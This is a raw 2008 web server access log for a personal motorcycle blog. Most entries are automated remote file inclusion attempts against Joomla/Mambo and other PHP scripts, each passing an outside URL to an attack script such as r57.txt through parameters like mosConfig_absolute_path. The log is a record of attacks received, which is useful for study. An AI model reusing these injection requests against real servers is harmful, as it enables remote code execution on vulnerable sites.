64.59.71.79 - - [28/Aug/2008:11:49:07 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:49:07 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:49:21 -0700] "GET /logs/access_080302.log/errors.php?error=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:49:21 -0700] "GET /errors.php?error=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:49:22 -0700] "GET /logs/errors.php?error=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.83.122.149 - - [28/Aug/2008:11:49:32 -0700] "GET /logs/access_080804.log//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:49:41 -0700] "GET /logs/access_080821.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:49:41 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:49:42 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:49:42 -0700] "GET /logs/access_080225.log//squirrelcart/cart_content.php?cart_isp_root=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:49:43 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:49:56 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:49:56 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:49:57 -0700] "GET /logs/access_080412.log//config/dbutil.bck.php?confdir=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:49:57 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sujianto.com/load.txt?? HTTP/1.1" 200 85447 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:49:57 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sujianto.com/load.txt?? HTTP/1.1" 200 85431 "-" "libwww-perl/5.65" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:11:50:01 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.147.239.184 - - [28/Aug/2008:11:50:11 -0700] "GET /logs//index.php?option=com_joomlaxplorer&task=&Itemid=&mosConfig_absolute_path=http://www.alpenverein-bb.de/touren/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:50:12 -0700] "GET /logs/access_080229.log//squirrelcart/cart_content.php?cart_isp_root=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.147.239.184 - - [28/Aug/2008:11:50:12 -0700] "GET //index.php?option=com_joomlaxplorer&task=&Itemid=&mosConfig_absolute_path=http://www.alpenverein-bb.de/touren/id.txt?? HTTP/1.1" 200 85395 "-" "libwww-perl/5.810" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:50:15 -0700] "GET /logs/access_080224.log/errors.php?error=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:50:16 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:50:22 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:50:26 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:50:27 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:50:27 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:50:34 -0700] "GET /logs/access_080510.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.38 - - [28/Aug/2008:11:51:07 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.38 - - [28/Aug/2008:11:51:07 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.38 - - [28/Aug/2008:11:51:07 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.38 - - [28/Aug/2008:11:51:08 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:51:19 -0700] "GET /logs/access_080702.log//modules/vwar/admin/admin.php?vwar_root=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:51:19 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:51:19 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:51:19 -0700] "GET /logs/access_080702.log//modules/vwar/admin/admin.php?vwar_root=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:51:19 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:51:19 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.176.116 - - [28/Aug/2008:11:51:36 -0700] "GET /logs/access_080713.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.116 - - [28/Aug/2008:11:51:36 -0700] "GET /logs/access_080710.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.83.122.149 - - [28/Aug/2008:11:51:39 -0700] "GET /logs/access_080610.log//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:51:41 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0045.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:51:50 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0107.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:52:11 -0700] "GET /logs/access_080410.log//newspublish/include.php?path%5Bdocroot%5D=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:52:27 -0700] "GET //index.php?DOCUMENT_ROOT=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 200 85195 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:52:40 -0700] "GET /logs/access_080302.log/popup.php?path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:52:41 -0700] "GET /popup.php?path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:52:42 -0700] "GET /logs/popup.php?path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:52:53 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0109.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
59.125.183.76 - - [28/Aug/2008:11:53:00 -0700] "GET /logs/access_080329.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.183.76 - - [28/Aug/2008:11:53:01 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.183.76 - - [28/Aug/2008:11:53:01 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.191.167.34 - - [28/Aug/2008:11:53:06 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.191.167.34 - - [28/Aug/2008:11:53:08 -0700] "GET //index.php?option=com_custompages&cpage=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 200 85279 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.81.72 - - [28/Aug/2008:11:53:25 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:53:27 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0089.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
213.174.1.62 - - [28/Aug/2008:11:53:47 -0700] "GET /logs//?mosConfig_absolute_path=http://www.surat1.go.th/nites/components/.psy/mig22.txt? HTTP/1.1" 200 62576 "-" "libwww-perl/5.803" "www.dmulk.com"
213.174.1.62 - - [28/Aug/2008:11:53:49 -0700] "GET //?mosConfig_absolute_path=http://www.surat1.go.th/nites/components/.psy/mig22.txt? HTTP/1.1" 200 85203 "-" "libwww-perl/5.803" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:53:54 -0700] "GET /logs/access_080313.log//modules/vwar/admin/admin.php?vwar_root=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:53:55 -0700] "GET /logs/access_080313.log//modules/vwar/admin/admin.php?vwar_root=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.129.230.66 - - [28/Aug/2008:11:53:58 -0700] "GET /logs/multithumb.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
78.129.230.66 - - [28/Aug/2008:11:53:58 -0700] "GET /multithumb.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
74.205.57.211 - - [28/Aug/2008:11:54:03 -0700] "GET /multithumb.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
74.205.57.211 - - [28/Aug/2008:11:54:03 -0700] "GET /logs/multithumb.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
59.125.183.76 - - [28/Aug/2008:11:54:29 -0700] "GET /logs/access_080215.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:54:40 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0096.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
67.192.48.154 - - [28/Aug/2008:11:54:45 -0700] "GET /multithumb.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
67.192.48.154 - - [28/Aug/2008:11:54:45 -0700] "GET /logs/multithumb.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:54:47 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0105.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:54:56 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0155.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
65.55.211.26 - - [28/Aug/2008:11:54:58 -0700] "GET /blog/?show=gallery&pageid=159 HTTP/1.1" 200 149783 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
80.199.179.9 - - [28/Aug/2008:11:55:22 -0700] "GET //trans/trans.php?trans=&p=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:55:24 -0700] "GET /logs/access_080224.log/popup.php?path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:55:27 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0160.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
213.218.133.175 - - [28/Aug/2008:11:55:29 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.218.133.175 - - [28/Aug/2008:11:55:29 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.57.211 - - [28/Aug/2008:11:55:37 -0700] "GET /logs//index.php?option=com_joomlaxplorer&task=&Itemid=&mosConfig_absolute_path=http://scrumpyonline.co.uk/mambo/media/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:55:37 -0700] "GET /logs/access_080302.log/popup.php?path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:55:38 -0700] "GET /popup.php?path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:55:38 -0700] "GET /logs/popup.php?path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.93.57.211 - - [28/Aug/2008:11:55:38 -0700] "GET //index.php?option=com_joomlaxplorer&task=&Itemid=&mosConfig_absolute_path=http://scrumpyonline.co.uk/mambo/media/on.txt? HTTP/1.1" 200 85403 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:11:55:45 -0700] "GET /bikes/dteel/2008_08_17/?S=D HTTP/1.0" 200 983 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:55:57 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0062.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:56:03 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0066.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:56:12 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:56:12 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:56:12 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:56:13 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.199.179.9 - - [28/Aug/2008:11:56:46 -0700] "GET /logs/access_080715.log//trans/trans.php?trans=&p=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.179.9 - - [28/Aug/2008:11:56:46 -0700] "GET //trans/trans.php?trans=&p=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.179.9 - - [28/Aug/2008:11:56:46 -0700] "GET /logs//trans/trans.php?trans=&p=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [28/Aug/2008:11:56:54 -0700] "GET /logs//parse/parser.php?WN_BASEDIR=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
69.64.34.172 - - [28/Aug/2008:11:56:54 -0700] "GET //parse/parser.php?WN_BASEDIR=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
89.111.176.9 - - [28/Aug/2008:11:56:56 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [28/Aug/2008:11:56:57 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85263 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [28/Aug/2008:11:57:03 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [28/Aug/2008:11:57:05 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85231 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [28/Aug/2008:11:57:10 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [28/Aug/2008:11:57:11 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85263 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [28/Aug/2008:11:57:15 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [28/Aug/2008:11:57:17 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85263 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:57:25 -0700] "GET /logs/access_080224.log/popup.php?path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.246.8.237 - - [28/Aug/2008:11:57:31 -0700] "GET /logs/access_080518.log/include/bbs.lib.inc.php?site_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [28/Aug/2008:11:57:31 -0700] "GET /include/bbs.lib.inc.php?site_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [28/Aug/2008:11:57:31 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.10.155.195 - - [28/Aug/2008:11:57:42 -0700] "GET /logs/access_080518.log/include/bbs.lib.inc.php?site_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.10.155.195 - - [28/Aug/2008:11:57:42 -0700] "GET /include/bbs.lib.inc.php?site_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.10.155.195 - - [28/Aug/2008:11:57:42 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.8.237 - - [28/Aug/2008:11:57:49 -0700] "GET /logs/access_080630.log/include/bbs.lib.inc.php?site_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:11:57:50 -0700] "GET /logs/access_080510.log/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:11:57:51 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 85459 "-" "libwww-perl/5.808" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:11:57:51 -0700] "GET /logs/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.155.195 - - [28/Aug/2008:11:58:03 -0700] "GET /logs/access_080630.log/include/bbs.lib.inc.php?site_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.110.205 - - [28/Aug/2008:11:58:12 -0700] "GET /blog/?show=gallery&pageid=159 HTTP/1.0" 200 149729 "http://search.live.com/results.aspx?q=motorcycles" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.205 - - [28/Aug/2008:11:58:12 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/?show=gallery&pageid=159" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.205 - - [28/Aug/2008:11:58:13 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/?show=gallery&pageid=159" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.205 - - [28/Aug/2008:11:58:13 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/?show=gallery&pageid=159" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.205 - - [28/Aug/2008:11:58:13 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.0" 200 29867 "http://dmulk.com/blog/?show=gallery&pageid=159" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.205 - - [28/Aug/2008:11:58:14 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.0" 200 8888 "http://dmulk.com/blog/?show=gallery&pageid=159" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.205 - - [28/Aug/2008:11:58:14 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.0" 200 6722 "http://dmulk.com/blog/?show=gallery&pageid=159" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
